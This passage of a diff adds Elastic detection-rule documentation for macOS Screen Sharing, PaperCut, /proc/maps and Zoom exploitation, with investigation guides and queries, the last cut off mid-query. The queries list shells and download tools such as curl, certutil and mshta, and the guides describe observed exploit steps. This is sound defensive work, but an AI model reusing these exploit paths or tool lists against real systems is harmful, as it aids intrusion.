+*Tags*: + +* Domain: Endpoint +* OS: macOS +* Use Case: Threat Detection +* Use Case: Vulnerability +* Tactic: Initial Access +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + ## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating SSFileCopySender Executed as Root* + + +This detects the macOS Screen Sharing file-copy helper starting with root privileges, which is abnormal because legitimate file transfers run in the remote user’s context. That pattern matters because it strongly suggests a pre-authentication Screen Sharing exploit path that lets an unauthenticated attacker invoke privileged file operations, for example by reaching the service over the network and copying a payload into /Library/LaunchDaemons before any user logs in. + + +*Possible investigation steps* + + +- Correlate the alert time with unified logs, firewall records, and endpoint network telemetry to identify the source IP that reached Screen Sharing and determine whether the connection came from an unexpected internal or external host. +- Reconstruct the 5–10 minute execution timeline around the event to capture the launch context and any follow-on activity such as shell, scripting, download, archive, permission-change, or service-management commands. +- Review concurrent and subsequent file activity for newly written or modified items in common staging and persistence paths such as /Library/LaunchDaemons, /Library/LaunchAgents, /Library/PrivilegedHelperTools, /Users/Shared, and temporary directories, and collect hashes for any payloads. +- Validate whether any legitimate remote administration or support session was expected on the host and compare that with authentication and user-session records to spot execution without a corresponding successful login or a rapid pivot to another local account. +- Scope for broader exploitation by confirming whether Screen Sharing or Remote Management was enabled, checking the host’s patch status for CVE-2026-65400, and searching for the same source IP or related indicators across other macOS systems. + + +*False positive analysis* + + +- An authorized administrator may manually invoke SSFileCopySender as root during macOS Screen Sharing troubleshooting or control validation; verify the parent process is an expected local shell or maintenance script, the activity aligns with a documented change window, and there are no unexpected follow-on file writes. +- A lab or staging Mac used for patch verification or regression testing may intentionally exercise the Screen Sharing file-copy helper with the 0/80 arguments; verify the host’s role, confirm the timing matches approved test activity, and ensure any related network source and copied files are expected. +- Legacy VNC authentication runs SSFileCopySender in a root context, so root-context execution alone is expected and this rule will fire on benign legacy-VNC sessions. Treat it as a lead, not a finding and corroborate with a near-in-time "SSFileCopyReceiver Writing to Common Persistence Locations" alert on the same host before take an action. + + +*Related Rules* + + +- SSFileCopyReceiver Writing to Common Persistence Locations - 5773cef4-11a5-4d51-a40b-0e0a79d68432 + + +*Response and remediation* + + +- Immediately isolate the affected Mac from the network, disable Screen Sharing and Remote Management on the host, and block the identified source IP or access path while preserving relevant logs and suspicious files for follow-up analysis. +- Remove attacker footholds by unloading and deleting unauthorized launchd items from /Library/LaunchDaemons and /Library/LaunchAgents, removing rogue binaries from /Library/PrivilegedHelperTools, /Users/Shared, and temporary directories, and deleting any unknown local accounts or added SSH authorized_keys. +- Restore the system to a known-good state by reimaging the host or recovering from a trusted backup if SSFileCopySender was followed by writes to privileged locations, modified system settings, or execution of additional payloads. +- Escalate to incident response immediately if you confirm persistence in system-wide paths, evidence of lateral movement, tampering with security tooling, or the same Screen Sharing source interacting with any other macOS endpoints. +- Harden the environment by applying the vendor patch for CVE-2026-65400, disabling Screen Sharing where it is not required, restricting remote administration to approved management networks or VPN, and rotating passwords for any local or administrative accounts exposed on the host. + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a macOS System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, for MacOS it is recommended to select "Traditional Endpoints". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/current/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +from logs-endpoint.events.process-* METADATA _id, _index, _version +| WHERE host.os.type == "macos" + AND event.type == "start" + AND process.name == "SSFileCopySender" + AND KQL(""" process.args : "0" AND process.args : "80" """) +| KEEP _id, _version, _index, + @timestamp, + data_stream.namespace, + host.name, + host.id, + user.id, + user.name, + process.name, + process.entity_id, + process.parent.name, + process.command_line +| SORT @timestamp DESC +| LIMIT 100 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Exploit Public-Facing Application +** ID: T1190 +** Reference URL: https://attack.mitre.org/techniques/T1190/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Exploitation for Privilege Escalation +** ID: T1068 +** Reference URL: https://attack.mitre.org/techniques/T1068/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-suspicious-child-process-of-papercut-server-component.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-suspicious-child-process-of-papercut-server-component.asciidoc new file mode 100644 index 0000000000..fe5bbac511 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-suspicious-child-process-of-papercut-server-component.asciidoc @@ -0,0 +1,227 @@ +[[prebuilt-rule-8-19-32-suspicious-child-process-of-papercut-server-component]] +=== Suspicious Child Process of PaperCut Server Component + +Detects suspicious child process execution originating from PaperCut server components, including the PaperCut NG/MF Application Server (pc-app.exe) and PaperCut Hive print job spooler (pc-printjob-spooler.exe). Active exploitation of CVE-2026-82078 and CVE-2026-81578 abuses unsafe dynamic class loading and an authentication bypass to achieve pre-authenticated remote code execution under pc-app.exe. Similar suspicious shell spawning has also been observed from PaperCut Hive's pc-printjob-spooler.exe (for example cmd.exe executing echo/test-style commands). Observed NG/MF in-the-wild activity includes discovery utilities such as whoami and tasklist; proof-of-concept exploitation has spawned unexpected Windows utilities such as charmap.exe as SYSTEM. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.process-* +* winlogbeat-* +* logs-windows.sysmon_operational-* +* logs-windows.forwarded* +* logs-system.security* +* endgame-* +* logs-m365_defender.event-* +* logs-sentinel_one_cloud_funnel.* +* logs-crowdstrike.fdr* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.papercut.com/kb/Main/security-bulletin-27-aug-2026-urgent-security-advisory/ +* https://www.huntress.com/blog/papercut-actively-exploited + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Use Case: Vulnerability +* Tactic: Initial Access +* Tactic: Execution +* Data Source: Elastic Defend +* Data Source: Elastic Endgame +* Data Source: Sysmon +* Data Source: Windows Security Event Logs +* Data Source: Microsoft Defender XDR +* Data Source: SentinelOne +* Data Source: Crowdstrike +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Suspicious Child Process of PaperCut Server Component* + + +PaperCut NG/MF Application Server (`pc-app.exe`) and PaperCut Hive components such as `pc-printjob-spooler.exe` should +not routinely spawn interactive shells, download utilities, or discovery tools. CVE-2026-81578 (authentication bypass) +chained with CVE-2026-82078 (unsafe dynamic class loading) enables pre-authentication remote code execution under +`pc-app.exe`. Huntress observed short exploitation windows with base64-encoded commands such as `whoami & ver` and +`whoami & ver & tasklist`, and reproduced RCE that spawned `charmap.exe` as SYSTEM under `pc-app.exe`. Separate telemetry +has also shown `pc-printjob-spooler.exe` under `Program Files\PaperCut Hive\` launching `cmd.exe` with attacker- or +test-controlled command lines. + + +*Possible investigation steps* + + +- Review the parent-child chain: `process.parent.name`/`process.parent.executable` (for example `pc-app.exe` or + `pc-printjob-spooler.exe` under `PaperCut*` install paths); inspect child `process.name`, `process.executable`, and + `process.command_line` for shells, LOLBins, discovery tools, or trivial probing commands such as `echo test`. +- Confirm PaperCut product (NG/MF vs Hive), version, and internet exposure of management or print-related services. + Unpatched or publicly reachable servers are high priority. +- For NG/MF parents, search the same `host.id` for `.class` file creation under `server\lib` (for example `Udydn.class`, + `Moo97.class`) and related artifacts under `server\data\content` (`*.cmd`, `*.out`). +- Inspect PaperCut logs for hex-encoded payloads, base64 command strings, Derby boot messages referencing + `memory:...\pwn`, `jdbc:derby:memory:pwn`, `ERROR No suitable driver found for jdbc:no:x`, or truncated/deleted logs. +- Correlate with inbound web or print-service requests around `@timestamp` (proxy, WAF, firewall). +- Pivot on `user.id` and `host.id` for follow-on credential access, persistence, or lateral movement within 48 hours. + + +*False positive analysis* + + +- PaperCut upgrades, support tooling, or rare admin scripts might spawn expected helpers. Validate change windows, + signed binaries, and command lines before exceptioning. +- Do not exclude on `pc-app.exe` or `pc-printjob-spooler.exe` alone; require a stable benign child path and command pattern. + + +*Response and remediation* + + +- Isolate or restrict network access to the implicated PaperCut service immediately if public-facing. +- Preserve PaperCut logs, configuration, process trees from the parent binary, and any `.class`/`.cmd`/`.out` artifacts + before upgrade or reboot. +- Apply PaperCut Emergency Patch Release 2 (or newer fixed builds) for NG/MF, including site/secondary servers; validate + Hive component versions and vendor guidance for Hive-specific hosts. +- Hunt estate-wide for the same child-process and `.class` drop patterns; rotate credentials if compromise is confirmed. + + +==== Setup + + + +*Setup* + + +This rule is designed for data generated by https://www.elastic.co/security/endpoint-security[Elastic Defend], which provides native endpoint detection and response, along with event enrichments designed to work with our detection rules. + +Setup instructions: https://ela.st/install-elastic-defend + + +*Additional data sources* + + +This rule also supports the following third-party data sources. For setup instructions, refer to the links below: + +- https://ela.st/sysmon-event-1-setup[Sysmon Event ID 1 - Process Creation] +- https://ela.st/audit-process-creation[Windows Process Creation Logs] +- https://ela.st/m365-defender[Microsoft Defender XDR] +- https://ela.st/sentinel-one-cloud-funnel[SentinelOne Cloud Funnel] +- https://ela.st/crowdstrike-integration[CrowdStrike] + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.parent.name : ("pc-app.exe", "pc-printjob-spooler.exe") and + ( + process.name : ( + "cmd.exe", + "powershell.exe", + "pwsh.exe", + "powershell_ise.exe", + "wscript.exe", + "cscript.exe", + "mshta.exe", + "rundll32.exe", + "regsvr32.exe", + "bitsadmin.exe", + "certutil.exe", + "curl.exe", + "wget.exe", + "net.exe", + "net1.exe", + "whoami.exe", + "tasklist.exe", + "ipconfig.exe", + "nltest.exe", + "systeminfo.exe", + "charmap.exe", + "calc.exe", + "mspaint.exe" + ) or + ?process.pe.original_file_name : ( + "Cmd.Exe", + "PowerShell.EXE", + "pwsh.dll", + "powershell_ise.EXE", + "wscript.exe", + "cscript.exe", + "MSHTA.EXE", + "RUNDLL32.EXE", + "REGSVR32.EXE", + "bitsadmin.exe", + "CertUtil.exe", + "curl.exe", + "wget.exe", + "net.exe", + "net1.exe", + "whoami.exe", + "tasklist.exe", + "ipconfig.exe", + "nltest.exe", + "systeminfo.exe", + "charmap.exe", + "CALC.EXE", + "mspaint.exe" + ) + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Exploit Public-Facing Application +** ID: T1190 +** Reference URL: https://attack.mitre.org/techniques/T1190/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Sub-technique: +** Name: Windows Command Shell +** ID: T1059.003 +** Reference URL: https://attack.mitre.org/techniques/T1059/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-suspicious-java-class-file-created-in-papercut-server-library.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-suspicious-java-class-file-created-in-papercut-server-library.asciidoc new file mode 100644 index 0000000000..481c67925c --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-suspicious-java-class-file-created-in-papercut-server-library.asciidoc @@ -0,0 +1,153 @@ +[[prebuilt-rule-8-19-32-suspicious-java-class-file-created-in-papercut-server-library]] +=== Suspicious Java Class File Created in PaperCut Server Library + +Detects creation of Java .class files within the PaperCut NG/MF Application Server library directory. During active exploitation of CVE-2026-82078 (chained with CVE-2026-81578), attackers deliver hex-encoded malicious .class payloads into the PaperCut server/lib path (observed examples include Udydn.class and Moo97.class) so arbitrary bytecode executes inside the PaperCut JVM / Application Server process. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.file-* + +*Severity*: critical + +*Risk score*: 99 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.papercut.com/kb/Main/security-bulletin-27-aug-2026-urgent-security-advisory/ +* https://www.huntress.com/blog/papercut-actively-exploited + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* OS: Linux +* OS: macOS +* Use Case: Threat Detection +* Use Case: Vulnerability +* Tactic: Initial Access +* Tactic: Execution +* Tactic: Defense Evasion +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Suspicious Java Class File Created in PaperCut Server Library* + + +PaperCut NG/MF loads database/driver-related classes from the Application Server classpath. CVE-2026-82078 allows unsafe +dynamic class loading when configuration can be manipulated (enabled by CVE-2026-81578 authentication bypass). Huntress +recovered attacker `.class` files written under `server\lib` (for example `Udydn.class`, `Moo97.class`) that decoded +commands, wrote output under `server\data\content`, then deleted staging files and often `server.log`. + + +*Possible investigation steps* + + +- Inspect `file.path`, `file.name`, `file.size`, and writing `process.executable`/`process.name`. Unexpected short or + random `.class` names under `server/lib` are high confidence. +- On the same host, look for companion artifacts under `server/data/content` (`.cmd`, `.out`) and for suspicious + `pc-app.exe` / Java child processes (shells, `whoami`, `tasklist`, `charmap.exe`). +- Review PaperCut `server/logs` for hex-encoded blobs, base64 command strings, `jdbc:derby:memory:pwn`, Derby boot paths + containing `\pwn`, or `ERROR No suitable driver found for jdbc:no:x`. Note missing/truncated `server.log` files. +- Confirm whether a PaperCut upgrade or emergency patch was running at `@timestamp`; legitimate upgrades also write + many `.class` files under `server/lib`. +- Scope other PaperCut servers for the same file names/paths and review internet exposure of the management interface. + + +*False positive analysis* + + +- PaperCut installation, upgrade, and emergency patch operations legitimately create `.class` files under `server/lib`. + Correlate with change tickets, installer process names, and volume of writes before treating as malicious. +- Exclude only tightly scoped upgrade processes/paths after validation; do not blanket-exclude the `server/lib` directory. + + +*Response and remediation* + + +- Restrict public access to the PaperCut Application Server immediately. +- Preserve `server/lib` `.class` files, `server/logs`, `server/data/content`, and process telemetry before cleanup or patch. +- Remove unauthorized `.class` payloads after evidence collection; apply PaperCut Emergency Patch Release 2 (or newer). +- Hunt for related child-process activity from `pc-app.exe` and rotate credentials if exploitation is confirmed. + + +==== Setup + + + +*Setup* + + +This rule is designed for data generated by https://www.elastic.co/security/endpoint-security[Elastic Defend], which provides native endpoint detection and response, along with event enrichments designed to work with our detection rules. + +Setup instructions: https://ela.st/install-elastic-defend + + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type in ("windows", "linux", "macos") and + event.action in ("creation", "overwrite") and + file.extension : "class" and + file.path : ( + "?:\\Program Files\\PaperCut*\\server\\lib\\*", + "?:\\Program Files (x86)\\PaperCut*\\server\\lib\\*", + "/opt/papercut/server/lib/*", + "/usr/local/papercut/server/lib/*", + "/Applications/PaperCut*/server/lib/*" + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Exploit Public-Facing Application +** ID: T1190 +** Reference URL: https://attack.mitre.org/techniques/T1190/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Reflective Code Loading +** ID: T1620 +** Reference URL: https://attack.mitre.org/techniques/T1620/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-suspicious-proc-maps-discovery.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-suspicious-proc-maps-discovery.asciidoc new file mode 100644 index 0000000000..f80ca5c8d4 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-suspicious-proc-maps-discovery.asciidoc @@ -0,0 +1,181 @@ +[[prebuilt-rule-8-19-32-suspicious-proc-maps-discovery]] +=== Suspicious /proc/maps Discovery + +Monitors for /proc/*/maps file reads. The /proc/*/maps file in Linux provides a memory map for a specific process, detailing the memory segments, permissions, and what files are mapped to these segments. Attackers may read a process's memory map to identify memory addresses for code injection or process hijacking. + +*Rule type*: eql + +*Rule indices*: + +* auditbeat-* +* endgame-* +* logs-crowdstrike.fdr* +* logs-endpoint.events.process* +* logs-sentinel_one_cloud_funnel.* +* logs-auditd_manager.auditd-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/arget13/DDexec + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Discovery +* Tactic: Credential Access +* Data Source: Auditd Manager +* Data Source: Elastic Defend +* Data Source: Elastic Endgame +* Data Source: Crowdstrike +* Data Source: SentinelOne +* Resources: Investigation Guide + +*Version*: 9 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Suspicious /proc/maps Discovery* + + +In Linux environments, the `/proc/*/maps` files provide detailed memory mapping of processes, crucial for system diagnostics. However, adversaries exploit this by reading these files to pinpoint memory addresses for malicious activities like code injection. The detection rule identifies suspicious reads of these files by monitoring specific command executions, such as `cat` or `grep`, initiated from common shell environments, flagging potential reconnaissance attempts. + + +*Possible investigation steps* + + +- Review the process details, including the process name and arguments, to confirm if the access to /proc/*/maps was initiated by a legitimate user or application. Pay special attention to the process.name and process.args fields. +- Check the process.entry_leader.name to determine the shell environment from which the command was executed, and assess if this aligns with typical user behavior or known scripts. +- Investigate the user account associated with the process to determine if there are any signs of compromise or unusual activity, such as recent logins from unfamiliar IP addresses or changes in user permissions. +- Examine the parent process and any related child processes to understand the broader context of the command execution, looking for any signs of a script or automated task that might have triggered the alert. +- Correlate this event with other security alerts or logs from the same host or user to identify any patterns or sequences of suspicious activities that could indicate a larger attack or reconnaissance effort. + + +*False positive analysis* + + +- System diagnostics tools may read /proc/*/maps files as part of routine checks. Identify these tools and create exceptions for their processes to avoid unnecessary alerts. +- Developers and system administrators might manually inspect /proc/*/maps during debugging or performance tuning. Establish a list of known users and processes that perform these actions regularly and exclude them from triggering the rule. +- Automated scripts for monitoring or logging purposes could access /proc/*/maps files. Review these scripts and whitelist them if they are verified to be non-malicious. +- Security software might access these files as part of its scanning operations. Confirm the legitimacy of such software and add it to an exception list to prevent false positives. +- Consider the context of the process entry leader. If certain shell environments are used predominantly for legitimate administrative tasks, adjust the rule to reduce sensitivity for those specific environments. + + +*Response and remediation* + + +- Immediately isolate the affected system from the network to prevent potential lateral movement by the adversary. +- Terminate any suspicious processes identified as reading the `/proc/*/maps` files using commands like `cat` or `grep` from unauthorized shell environments. +- Conduct a memory analysis on the affected system to identify any injected code or unauthorized modifications in the process memory. +- Review and audit user accounts and permissions on the affected system to ensure that only authorized users have access to sensitive files and directories. +- Implement stricter access controls and monitoring on `/proc/*/maps` files to limit exposure and detect unauthorized access attempts. +- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are compromised. +- Update and enhance endpoint detection and response (EDR) solutions to improve monitoring and alerting for similar suspicious activities in the future. + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and +event.action in ("exec", "exec_event", "start", "ProcessRollup2", "executed", "process_started") and +process.name in ("cat", "grep", "tail", "less", "more", "egrep", "fgrep", "awk") and process.args like "/proc/*/maps" and +not ( + ?process.parent.args in ("/usr/bin/finalrd", "/sbin/chkrootkit", "./uac", "/usr/sbin/chkrootkit") or + ?process.parent.executable in ("/usr/sbin/chkrootkit", "/sbin/chkrootkit") or + ?process.parent.name == "uac" or + ?process.parent.executable in ("/opt/secl/linux-ir-scripts-v3/thieves.sh", "/opt/traps/rpm-installer/setup.sh") or + ?process.working_directory like ("/opt/traps/deb-installer", "/opt/Tanium/TaniumClient/*") or + ?process.parent.executable like ("/home/*/sunlight/thieves.sh") or + (?process.parent.executable == "/usr/lib/systemd/systemd" and ?process.parent.command_line == "/sbin/init") or + ?process.group_leader.executable in ("/usr/local/qualys/cloud-agent/bin/qualys-cloud-agent", "/opt/traps/bin/cytool") +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: Process Discovery +** ID: T1057 +** Reference URL: https://attack.mitre.org/techniques/T1057/ +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: OS Credential Dumping +** ID: T1003 +** Reference URL: https://attack.mitre.org/techniques/T1003/ +* Sub-technique: +** Name: Proc Filesystem +** ID: T1003.007 +** Reference URL: https://attack.mitre.org/techniques/T1003/007/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-suspicious-process-execution-by-zoom.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-suspicious-process-execution-by-zoom.asciidoc new file mode 100644 index 0000000000..71cab7e7f3 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-suspicious-process-execution-by-zoom.asciidoc @@ -0,0 +1,202 @@ +[[prebuilt-rule-8-19-32-suspicious-process-execution-by-zoom]] +=== Suspicious Process Execution by Zoom + +Identifies suspicious process execution associated with the Zoom desktop client on macOS and Linux. The rule detects shells, script interpreters, downloaders, and network utilities spawned by Zoom on either platform. On Linux, it also detects Zoom replacing its own process image with an executable outside the Zoom installation directory. These behaviors may indicate successful exploitation of a Zoom client vulnerability, including CVE-2026-53413. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.process-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://a.security/blog/asecurity-zoomsday +* https://www.zoom.com/en/trust/security-bulletin/zsb-26015/ +* https://www.securityweek.com/zoom-patches-zero-click-code-execution-vulnerability/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* OS: macOS +* Use Case: Threat Detection +* Use Case: Vulnerability +* Tactic: Execution +* Data Source: Elastic Defend +* Rule Type: Event Correlation (EQL) +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Suspicious Process Execution by Zoom* + + +CVE-2026-53413 is a buffer overwrite in Zoom's annotation parser that can allow a meeting participant to execute code +on another participant's device. The published macOS exploit replaced the running `zoom.us` process image with Safari +using `execvp`. Other payloads may instead spawn a shell, interpreter, downloader, or network utility. This rule detects +suspicious Zoom child processes on macOS and Linux and in-place Zoom process-image replacement on Linux, where Elastic +Defend records the prior image in `process.previous.executable`. The Linux logic identifies the Zoom executable +regardless of its installation path. + + +*Possible investigation steps* + + +- Determine which branch matched. For a child process, verify that `process.parent.executable` is the genuine Zoom + client. For Linux image replacement, compare `process.previous.executable` with `process.executable` and review the + new image's path, hash, arguments, and provenance. The image-replacement branch excludes direct Zoom children because + `process.previous.executable` includes the image inherited at fork as well as subsequent executions. +- Review the process command line and arguments for payload download, shell commands, persistence, credential access, + discovery, or outbound connection activity. +- Use `process.entity_id` and `process.parent.entity_id` to examine related process, file, and network events before and + after the alert. Look for additional payloads, persistence changes, credential access, and communication with + untrusted destinations. +- Confirm the installed Zoom version and whether it was vulnerable at the alert time. Zoom Workplace releases before + `7.1.5` and `7.0.6` in their respective branches are affected by CVE-2026-53413. +- Establish whether the user was in a Zoom meeting near the alert time. Preserve the meeting UUID and occurrence, + participant report, client version, join and leave times, screen-sharing state, and available Zoom client logs. +- Review crash diagnostics for annotation-library faults or memory-corruption indicators near the alert. A crash alone + is not sufficient evidence of exploitation. +- Check for other alerts on the host and for similar activity involving the same meeting participants or source + infrastructure. + + +*False positive analysis* + + +- Zoom may invoke legitimate support, diagnostic, accessibility, update, or enterprise-management tooling. Validate the + binary's signature, path, command line, prevalence, and relationship to an approved workflow. +- Zoom performs Linux startup checks through a shell, including audio, graphics, desktop portal, and process-limit + discovery. The known commands are excluded by this rule; investigate variations or additional chained commands. +- Opening authentication or meeting links normally uses an operating-system broker and should not require Zoom to spawn + a shell or replace its own image. Treat direct shell, interpreter, or downloader execution as suspicious unless a + specific benign workflow is confirmed. + + +*Response and remediation* + + +- If exploitation is suspected, isolate the host and preserve process, file, network, crash, Zoom client, and meeting + audit evidence before terminating processes or reimaging. +- Update Zoom to a fixed release and enforce minimum client versions. Until vulnerable clients are removed, disable + end-to-end encryption so Zoom's server-side annotation filtering can inspect meeting content. +- Restrict meeting access with waiting rooms, passcodes, and authenticated-user requirements, and disable unnecessary + annotation, whiteboarding, remote-control, file-transfer, and participant screen-sharing features. +- Remove malicious artifacts and persistence, rotate credentials accessible to the compromised user or process, and + investigate other participants and endpoints associated with the meeting. + + +==== Setup + + + +*Setup* + + +This rule requires process events from Elastic Defend on macOS or Linux. + +Elastic Defend is integrated into the Elastic Agent using Fleet. Configure the integration to collect process events +from protected endpoints. The Linux image-replacement branch requires `process.previous.executable`, which Elastic +Defend provides on Linux `exec` process events. + + +==== Rule query + + +[source, js] +---------------------------------- +process where event.type == "start" and event.action == "exec" and + ( + ( + host.os.type == "linux" and + process.previous.executable : "*/zoom" and + not 